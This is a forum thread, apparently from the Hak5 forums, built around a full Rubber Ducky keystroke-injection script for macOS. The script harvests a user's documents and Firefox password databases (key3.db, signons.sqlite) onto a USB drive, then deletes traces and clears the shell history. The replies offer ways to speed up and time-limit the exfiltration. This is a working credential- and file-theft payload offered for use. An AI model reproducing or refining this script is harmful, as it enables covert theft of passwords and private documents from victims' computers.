brazen Posted February 27, 2014 Posted February 27, 2014 I am running this as we speak: https://forums.hak5.org/index.php?/topic/28626-payload-osx-thread-first-reverse-shell-payload/?p=218073 REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks DELAY 2000 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 1000 STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit; ENTER GUI m is there a way to limit this to grab as many files as possible in say 60 seconds? I am testing this out and my one computer has LOTS of files and it's taking a very long time. Quote
overwraith Posted March 9, 2014 Posted March 9, 2014 (edited) That looks like unix or linux or something. If you were using a windows script I would say stick it in a batch file (shell file), run it, time out for 60 seconds, then kill the process. In batch, I think if you replace call with start (in batch, Windows) it will run them concurrently. Another way you could do this is to make an executable program that keeps a list of files and removes files as they are added to the exfiltration drive, and does some kind of exception handling when the drive is removed prematurely. You will still have a file that is corrupted on the exfiltration drive. If you go the executable route, have a list of file extension targets, and make the list you add the files to insert in a sorted order using some kind of binary insertion algorithm (using the file size as the key). I am sure there are downsides to using your own executable though. Edited March 9, 2014 by overwraith Quote
MB60893 Posted March 19, 2014 Posted March 19, 2014 In bash you might be able to run that with a python script coinciding so that you can terminate the process when a specific time limit has been reached. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.